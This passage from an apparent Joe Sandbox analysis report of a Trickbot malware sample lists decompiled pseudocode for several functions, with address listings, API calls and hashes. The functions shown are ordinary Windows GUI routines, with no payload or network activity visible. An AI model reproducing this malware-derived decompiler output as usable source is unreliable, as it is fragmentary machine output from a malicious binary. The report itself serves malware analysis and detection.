								SendMessageA( *(_t67 + 0x1c), 0x19a, _t48,  *(_t72 - 0x18));
								goto L6;
							}
						}
					}
					L15:
					 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
					return _t39;
				}
				_t37 = SendMessageA( *(_t67 + 0x1c), 0x18b, 0, 0);
				if(_t37 != 0) {
					_push(0);
					_push(0);
					if(_t37 != 1) {
						SendMessageA( *(_t67 + 0x1c), 0x186, ??, ??);
					} else {
						_t40 = SendMessageA( *(_t67 + 0x1c), 0x199, ??, ??);
						_t60 =  *((intOrPtr*)(_t72 - 0x14));
						_push(1);
						 *( *((intOrPtr*)(_t72 - 0x14)) + 0x60) = _t40;
						goto L10;
					}
				} else {
					_t60 =  *((intOrPtr*)(_t72 - 0x14));
					_push(0xffffffff);
					L10:
					E004179AE(_t60);
				}
				_t39 = E00417AD6( *((intOrPtr*)(_t72 - 0x14)), _t67);
				goto L15;
			}

0x0042abbc
0x0042abc7
0x0042abcb
0x0042abdb
0x0042abe7
0x0042abec
0x0042abef
0x0042abf3
0x0042abf5
0x0042abf7
0x0042abfa
0x0042abff
0x0042ac02
0x0042ac07
0x0042ac0e
0x0042ac10
0x0042ac16
0x0042ac41
0x0042ac41
0x0042ac48
0x00000000
0x0042ac18
0x0042ac18
0x0042ac1f
0x00000000
0x0042ac21
0x0042ac2c
0x0042ac31
0x0042ac54
0x0042ac59
0x0042ac60
0x0042ac65
0x0042ac33
0x0042ac3f
0x00000000
0x0042ac3f
0x0042ac31
0x0042ac1f
0x0042acb6
0x0042acbc
0x0042acc4
0x0042acc4
0x0042ac75
0x0042ac7b
0x0042ac8c
0x0042ac8d
0x0042ac8e
0x0042acac
0x0042ac90
0x0042ac98
0x0042ac9a
0x0042ac9d
0x0042ac9f
0x00000000
0x0042ac9f
0x0042ac7d
0x0042ac7d
0x0042ac80
0x0042ac82
0x0042ac82
0x0042ac82
0x0042acb1
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0042ABBC

Part of subcall function 0041B5B5: GetDlgItem.USER32(?,?), ref: 0041B5C3

SendMessageA.USER32(?,00000184,00000000,00000000), ref: 0042ABE7
SendMessageA.USER32(?,00000180,00000000,?), ref: 0042AC2C
SendMessageA.USER32(?,0000019A,00000000,?), ref: 0042AC3F
SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 0042AC75
SendMessageA.USER32(?,00000199,00000000,00000000), ref: 0042AC98
SendMessageA.USER32(?,00000186,00000000,00000000), ref: 0042ACAC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSend$H_prologItem
String ID:
API String ID: 621129232-0
Opcode ID: 1c26ab7e009c79109e5abae75aa7852242aaffb60e1ec7b4103b96e8150eddcb
Instruction ID: 63e4eefbe4e0b1c0a72d2788870ec25656163b125c34a88585b8646ff06262ec
Opcode Fuzzy Hash: 1c26ab7e009c79109e5abae75aa7852242aaffb60e1ec7b4103b96e8150eddcb
Instruction Fuzzy Hash: 0B31A130700215AFDB04DF55DD86FAEBB71BF04720F20422AE511AA2E1CB74AD51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00436DCB, Relevance: 10.6, APIs: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436DCB(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				int _t43;
				long _t45;
				struct tagSIZE* _t48;
				int _t51;

				_t41 = __ecx;
				_t51 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t48 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t48);
					if(_t48->cx > 0xffffc000) {
						while(1) {
							_t41 = _t48->cx;
							if(_t41 >= 0x4000) {
								goto L6;
							}
							_t45 = _t39->cx;
							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
								_t41 = _t41 + _t41;
								_t48->cx = _t41;
								_t39->cx = _t45 + _t45;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L6;
						}
					}
					L6:
					if( *(_t51 + 0x34) > 0xffffc000) {
						while(1) {
							_t41 =  *(_t51 + 0x34);
							if(_t41 >= 0x4000) {
								goto L11;
							}
							_t43 =  *(_t51 + 0x3c);
							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
								_t41 = _t41 + _t41;
								 *(_t51 + 0x34) = _t41;
								 *(_t51 + 0x3c) = _t43 + _t43;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L11;
						}
					}
					L11:
					_t39->cx = E00435FE8(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x44b310,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
					 *(_t51 + 0x3c) = E00435FE8(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x44b314,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
				}
				_t26 =  *(_t51 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
					return E00436ED0(_t51);
				}
				return _t26;
			}

0x00436dcb
0x00436dd1
0x00436dd3
0x00436dda
0x00436de2
0x00436de8
0x00436def
0x00436dfc
0x00436dfe
0x00436dfe
0x00436e06
0x00000000
0x00000000
0x00436e08
0x00436e0c
0x00436e16
0x00436e1c
0x00436e1e
0x00436e20
0x00000000
0x00000000
0x00436e20
0x00000000
0x00436e0c
0x00436dfe
0x00436e22
0x00436e25
0x00436e27
0x00436e27
0x00436e30
0x00000000
0x00000000
0x00436e32
0x00436e37
0x00436e41
0x00436e47
0x00436e4a
0x00436e4d
0x00000000
0x00000000
0x00436e4d
0x00000000
0x00436e37
0x00436e27
0x00436e4f
0x00436e72
0x00436e8f
0x00436e92
0x00436e93
0x00436e98
0x00436e9d
0x00436eae
0x00436ebf
0x00000000
0x00436ec7
0x00436ecd

APIs

GetViewportExtEx.GDI32(?,?), ref: 00436DE2
GetWindowExtEx.GDI32(?,?), ref: 00436DEF
GetDeviceCaps.GDI32(?,00000058), ref: 00436E5A
GetDeviceCaps.GDI32(?,0000005A), ref: 00436E77
SetMapMode.GDI32(00000000,00000008), ref: 00436E9D
SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 00436EAE
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 00436EBF

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode
String ID:
API String ID: 396987064-0
Opcode ID: 59358a1ebc2c0bb9ec79cbc61d1b169e630b456f2c9d16090ef3e2fad886905a
Instruction ID: 6eddb97f4d8870a1f1b9193a11ebf6e97c11fe7c72b9581baa89cc462e3fb83c
Opcode Fuzzy Hash: 59358a1ebc2c0bb9ec79cbc61d1b169e630b456f2c9d16090ef3e2fad886905a
Instruction Fuzzy Hash: E0316D35100A02AFDB355F25DE41A27BBF6FF88701F11A42EE24281A60C775A855DF08

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1B5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041E1B5(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t22;
				int _t32;
				CHAR* _t34;
				intOrPtr _t36;
				CHAR* _t41;
				void* _t45;
				void* _t48;

				_t41 = _a4;
				_t32 = lstrlenA(_t41);
				_t22 = E00433CD5(_t41, 0, 0) - 1;
				_t45 = _t32 - _t22;
				_a4 = _t22;
				_t36 = _t45 + _t41;
				_v8 = _t36;
				if(_a8 < _t32) {
					if(_a8 >= _t22) {
						_t34 =  &(_t41[2]);
						if( *_t41 == 0x5c && _t41[1] == 0x5c) {
							while( *_t34 != 0x5c) {
								_t34 = E00405BB8(_t34);
							}
						}
						if(_t45 > 3) {
							do {
								_t34 = E00405BB8(_t34);
							} while ( *_t34 != 0x5c);
						}
						_t48 = _t34 - _t41;
						if(_a8 >= _t48 +  &(_a4[5])) {
							while(lstrlenA(_t34) + _t48 + 4 > _a8) {
								do {
									_t34 = E00405BB8(_t34);
								} while ( *_t34 != 0x5c);
							}
							 *(_t48 + _t41) =  *(_t48 + _t41) & 0x00000000;
							lstrcatA(_t41, "\...");
							_t22 = lstrcatA(_t41, _t34);
						} else {
							_push(_v8);
							goto L13;
						}
					} else {
						if(_a12 == 0) {
							_t36 = 0x449788;
						}
						_push(_t36);
						L13:
						_t22 = lstrcpyA(_t41, ??);
					}
				}
				return _t22;
			}

0x0041e1bc
0x0041e1cb
0x0041e1d2
0x0041e1d5
0x0041e1da
0x0041e1dd
0x0041e1e0
0x0041e1e3
0x0041e1ec
0x0041e1ff
0x0041e202
0x0041e20a
0x0041e216
0x0041e216
0x0041e20a
0x0041e21d
0x0041e21f
0x0041e225
0x0041e228
0x0041e21f
0x0041e232
0x0041e23b
0x0041e249
0x0041e259
0x0041e25f
0x0041e262
0x0041e267
0x0041e269
0x0041e279
0x0041e27d
0x0041e23d
0x0041e23d
0x00000000
0x0041e23d
0x0041e1ee
0x0041e1f2
0x0041e1f4
0x0041e1f4
0x0041e1f9
0x0041e240
0x0041e241
0x0041e241
0x0041e1ec
0x0041e283

APIs

lstrlenA.KERNEL32(?), ref: 0041E1C0

Part of subcall function 00433CD5: lstrlenA.KERNEL32(00000104,00000000,?,00433C19), ref: 00433D0C

lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 0041E241
lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 0041E24A
lstrcatA.KERNEL32(?,\...), ref: 0041E279
lstrcatA.KERNEL32(?,?), ref: 0041E27D

Strings

\..., xrefs: 0041E273

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: lstrlen$lstrcat$lstrcpy
String ID: \...
API String ID: 2778582283-1167917071
Opcode ID: 2e4b2251d7e88ea50e4383ec5ae115814b18c2cc3648c5935855a9390340784e
Instruction ID: c5b0d186b5e6e00bf646628a34ffe7ef319debc6b4a4fc3aaf02cd7c5ee6fe8b
Opcode Fuzzy Hash: 2e4b2251d7e88ea50e4383ec5ae115814b18c2cc3648c5935855a9390340784e
Instruction Fuzzy Hash: 8C210A75904715EEEB209B62CC80FEB7BECAB19355F1441AFFD0192181D3BCAD808B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A5EE, Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0042A60B
GetMessageA.USER32(0000000F,00000000,0000000F,0000000F), ref: 0042A619
DispatchMessageA.USER32(?), ref: 0042A62C
SetRectEmpty.USER32(?), ref: 0042A655
GetDesktopWindow.USER32 ref: 0042A66D
LockWindowUpdate.USER32(?), ref: 0042A67E
GetDCEx.USER32(?,00000000,00000003), ref: 0042A695

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 33879e7665ae184719dfb36f7fee613eec93c6130e3ad06d96c7ef6a59c10d0f
Instruction ID: 7f7fbaa4fa5e0c4174574a3d56e538dd8143d8bd7430bf6d1951b2961d2ba38a
Opcode Fuzzy Hash: 33879e7665ae184719dfb36f7fee613eec93c6130e3ad06d96c7ef6a59c10d0f
Instruction Fuzzy Hash: 28214FB2500709AFD7109FA6EC84E67BBECFB08344B44092EF686C3651D775E8158B69

Uniqueness

Uniqueness Score: -1.00%

Function 004122E0, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004122E0(struct HWND__* _a4, signed int _a8) {
				struct tagRECT _v16;
				signed int _t30;
				intOrPtr _t39;
				signed char _t43;
				struct HWND__* _t49;
				struct HWND__* _t50;
				signed int _t51;

				_t49 = _a4;
				GetWindowRect(_t49,  &_v16);
				_t30 = GetWindowLongA(_t49, 0xfffffff0);
				_t51 = _t30;
				if((_t30 & 0x10000000) == 0) {
					L12:
					return _t30;
				}
				_t30 = _a8;
				if(_t30 == 0) {
					L9:
					InflateRect( &_v16, 1, 1);
					_t50 = GetParent(_t49);
					ScreenToClient(_t50,  &_v16);
					ScreenToClient(_t50,  &(_v16.right));
					if((_t51 & 0x00200000) != 0) {
						_v16.right.x = _v16.right.x + 1;
					}
					return InvalidateRect(_t50,  &_v16, 0);
				}
				_t43 =  *(_t30 + 0x18);
				if((_t43 & 0x000000c0) != 0 || (_t43 & 0x00000002) == 0 || (_t43 & 0x00000001) == 0) {
					if((_t43 & 0x00000003) == 2 && _v16.right.x -  *((intOrPtr*)(_t30 + 0x10)) == _v16.left) {
						_t39 =  *((intOrPtr*)(_t30 + 0x14));
						if(_v16.bottom - _v16.top >= _t39) {
							_v16.top = _v16.top + _t39 + 1;
						}
					}
					goto L9;
				} else {
					goto L12;
				}
			}

0x004122ea
0x004122f0
0x004122f9
0x00412304
0x00412306
0x0041239d
0x0041239d
0x0041239d
0x0041230c
0x00412312
0x0041234f
0x00412358
0x00412365
0x00412373
0x0041237b
0x00412383
0x00412385
0x00412385
0x00000000
0x00412391
0x00412314
0x0041231a
0x0041232c
0x0041233b
0x00412348
0x0041234b
0x0041234b
0x00412348
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetWindowRect.USER32(?), ref: 004122F0
GetWindowLongA.USER32(?,000000F0), ref: 004122F9
InflateRect.USER32(?,00000001,00000001), ref: 00412358
GetParent.USER32(?), ref: 0041235F
ScreenToClient.USER32(00000000,?), ref: 00412373
ScreenToClient.USER32(00000000,?), ref: 0041237B
InvalidateRect.USER32(00000000,?,00000000), ref: 00412391

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
String ID:
API String ID: 1809568455-0
Opcode ID: 4bf9e6cfa3013578ec501a8ca1b2056eff676eba730fc66a29c25e174bd67c58
Instruction ID: a302ff98f942a49cac17a4907d8431e305890a9432ffe03326d09e1dcc17417d
Opcode Fuzzy Hash: 4bf9e6cfa3013578ec501a8ca1b2056eff676eba730fc66a29c25e174bd67c58
Instruction Fuzzy Hash: 19215B3110420AAFD715DB64C999FBF73A9EB84720F04055EF961C2291D7B8DC85CB26

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3D0, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041A3D0(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
				struct tagRECT _v20;
				int _t15;
				int _t23;
				struct HDWP__* _t25;
				struct HWND__* _t26;
				int _t27;
				long _t28;
				struct HDWP__** _t35;
				RECT* _t37;

				_t26 = _a8;
				_t15 = GetParent(_t26);
				_t35 = _a4;
				_a8 = _t15;
				if(_t35 == 0 ||  *_t35 != 0) {
					GetWindowRect(_t26,  &_v20);
					ScreenToClient(_a8,  &_v20);
					ScreenToClient(_a8,  &(_v20.right));
					_t37 = _a12;
					_t15 = EqualRect( &_v20, _t37);
					if(_t15 == 0) {
						_t23 = _t37->top;
						_t27 = _t37->left;
						_t28 = _t37->bottom;
						_push(0x14);
						if(_t35 == 0) {
							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						}
						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						 *_t35 = _t25;
						return _t25;
					}
				}
				return _t15;
			}

0x0041a3d7
0x0041a3dd
0x0041a3e3
0x0041a3e6
0x0041a3eb
0x0041a3f7
0x0041a40a
0x0041a413
0x0041a415
0x0041a41d
0x0041a425
0x0041a427
0x0041a42a
0x0041a42c
0x0041a42f
0x0041a433
0x00000000
0x0041a45d
0x0041a445
0x0041a44b
0x00000000
0x0041a44b
0x0041a425
0x0041a467

APIs

GetParent.USER32(?), ref: 0041A3DD
GetWindowRect.USER32(?,?), ref: 0041A3F7
ScreenToClient.USER32(?,?), ref: 0041A40A
ScreenToClient.USER32(?,?), ref: 0041A413
EqualRect.USER32(?,?), ref: 0041A41D
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041A445
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0041A45D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: e32be0cc4275794a2e0be4cf0687a7c16bd4c5a4422cdc4f6f62d4adffeb7bbf
Instruction ID: 5d2d534cf4012ec7ceedb171feb202282690da689da753be87fadc4c52250ea9
Opcode Fuzzy Hash: e32be0cc4275794a2e0be4cf0687a7c16bd4c5a4422cdc4f6f62d4adffeb7bbf
Instruction Fuzzy Hash: F8114F7650020ABFEB118F68DC48EBB7BBDEF84720F148529B91593214E7B4BD54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042ECD3, Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0042ECD3(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

0x0042ecd6
0x0042ece0
0x0042ece9
0x0042eceb
0x0042eced
0x0042eced
0x0042ecf9
0x0042ecfb
0x0042ecfd
0x0042ecfd
0x0042ed0a
0x0042ed14
0x0042ed17
0x0042ed43
0x0042ed45
0x0042ed56
0x0042ed60
0x0042ed60
0x0042ed19
0x0042ed36
0x0042ed36
0x0042ed73

APIs

GetKeyState.USER32(00000011), ref: 0042ECE4
GetKeyState.USER32(00000010), ref: 0042ECF4
GetFocus.USER32 ref: 0042ED04
GetDesktopWindow.USER32 ref: 0042ED0C
SendMessageA.USER32(?,0000020A,?,?), ref: 0042ED30
SendMessageA.USER32(00000000,0000020A,?,?), ref: 0042ED4F
GetParent.USER32(00000000), ref: 0042ED58

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: c6625e0e4aa98bb0098b428e57794609b0d8ececdf0b99c66cefef8c79aa2cb7
Instruction ID: 5809970d3461b2fdf6e426c59a9eef4763b94e57caca7e5a9e1e61cedd835968
Opcode Fuzzy Hash: c6625e0e4aa98bb0098b428e57794609b0d8ececdf0b99c66cefef8c79aa2cb7
Instruction Fuzzy Hash: 96112732B00335BFEB101BA7BC48EAA76A8EB14794F404433FE02D7240D6F49D4246A8

Uniqueness

Uniqueness Score: -1.00%

Function 0043263D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0043263D(void* __eflags, CHAR** _a4, struct HINSTANCE__* _a8, signed int _a12) {
				void* __ebp;
				void* _t14;
				struct HINSTANCE__* _t18;
				CHAR* _t22;
				short* _t28;
				CHAR** _t36;
				void* _t37;
				short _t38;

				_push(E004326ED);
				_t14 = E00432DE3(0x44b2f0);
				_t28 = _a8;
				_t36 = _a4;
				_t37 = _t14;
				if( *((short*)(_t37 + 8)) == 0) {
					_t18 = GetModuleHandleA("COMCTL32.DLL");
					_a8 = _t18;
					if(_t18 != 0) {
						asm("sbb ecx, ecx");
						if(LoadResource(_a8, FindResourceA(_t18, ( ~_a12 & 0x0000000e) + 0x000003ee & 0x0000ffff, 5)) != 0) {
							E0041C952(_t26, _t36, _t28);
						}
					}
					_t22 = GlobalAlloc(0x40,  *((intOrPtr*)( *_t36 - 8)) + 1);
					 *(_t37 + 4) = _t22;
					lstrcpyA(_t22,  *_t36);
					 *((short*)(_t37 + 8)) =  *_t28;
				}
				E00418005(_t36,  *(_t37 + 4));
				_t38 =  *((intOrPtr*)(_t37 + 8));
				 *_t28 = _t38;
				return 0 | _t38 != 0x0000ffff;
			}

0x00432643
0x0043264d
0x00432652
0x00432655
0x00432658
0x0043265f
0x00432666
0x0043266e
0x00432671
0x0043267a
0x0043269c
0x004326a1
0x004326a6
0x0043269c
0x004326b2
0x004326b8
0x004326be
0x004326c7
0x004326c7
0x004326d0
0x004326d5
0x004326db
0x004326ea

APIs

Part of subcall function 00432DE3: __EH_prolog.LIBCMT ref: 00432DE8

GetModuleHandleA.KERNEL32(COMCTL32.DLL,004326ED,?,?,00000000,?,0042B8C0,?,?,?), ref: 00432666
FindResourceA.KERNEL32(00000000,7C52FF10,00000005), ref: 0043268A
LoadResource.KERNEL32(?,00000000,?,?,00000000,?,0042B8C0,?,?,?), ref: 00432694
GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,0042B8C0,?,?,?), ref: 004326B2
lstrcpyA.KERNEL32(00000000,?,?,?,00000000,?,0042B8C0,?,?,?), ref: 004326BE

Strings

COMCTL32.DLL, xrefs: 00432661

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Resource$AllocFindGlobalH_prologHandleLoadModulelstrcpy
String ID: COMCTL32.DLL
API String ID: 2873249453-3939725795
Opcode ID: 300396df2a23024f370387cdeb0b6393bf04e2ccc6fb2829a469224553747614
Instruction ID: 86f42ea9386f31df8c89762f6029d1ebf92b9594c838981b4cbdf6df4559d254
Opcode Fuzzy Hash: 300396df2a23024f370387cdeb0b6393bf04e2ccc6fb2829a469224553747614
Instruction Fuzzy Hash: C111C1B5500604AFDB109F61DC89E7B77A8EF48710B10942EFD1687290DBB89C40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00404366, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00404366(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t18;
				intOrPtr* _t22;
				intOrPtr _t30;

				if(E004041CD() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						return 0;
					}
					_t22 = _a8;
					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t22 + 4)) = 0;
						 *((intOrPtr*)(_t22 + 8)) = 0;
						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t30 = 1;
						 *(_t22 + 0x10) = _t18;
						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
						if( *_t22 >= 0x48) {
							lstrcpyA(_t22 + 0x28, "DISPLAY");
						}
						return _t30;
					}
				}
				return  *0x44b0d0(_a4, _a8);
			}

0x00404375
0x0040438c
0x004043f1
0x00000000
0x004043f1
0x0040438e
0x00404395
0x00000000
0x004043ae
0x004043af
0x004043b2
0x004043c0
0x004043c3
0x004043cb
0x004043cc
0x004043cd
0x004043d3
0x004043d4
0x004043d5
0x004043d8
0x004043dc
0x004043e7
0x004043e7
0x00000000
0x004043ed
0x00404395
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004043A4
GetSystemMetrics.USER32(00000000), ref: 004043BC
GetSystemMetrics.USER32(00000001), ref: 004043C3
lstrcpyA.KERNEL32(?,DISPLAY), ref: 004043E7

Strings

B, xrefs: 00404385
DISPLAY, xrefs: 004043E1

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: 803fb7f1ec05114476e0d556a0618346733784654ea8634bb376fe09c94bbbf4
Instruction ID: dc1f3393fd28e443437a049353cbdfcb92f7d4e5a3866b994607ec524a07f0c7
Opcode Fuzzy Hash: 803fb7f1ec05114476e0d556a0618346733784654ea8634bb376fe09c94bbbf4
Instruction Fuzzy Hash: D911E0B1600224EBCF019F659C84A8BBBA8EF49750B005033FE04AA181D2B9D940CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0, Relevance: 10.5, APIs: 7, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004123A0(struct HWND__* _a4) {
				struct tagRECT _v16;
				signed int _t11;
				struct HWND__* _t24;
				struct HWND__* _t25;

				_t24 = _a4;
				_t11 = GetWindowLongA(_t24, 0xfffffff0);
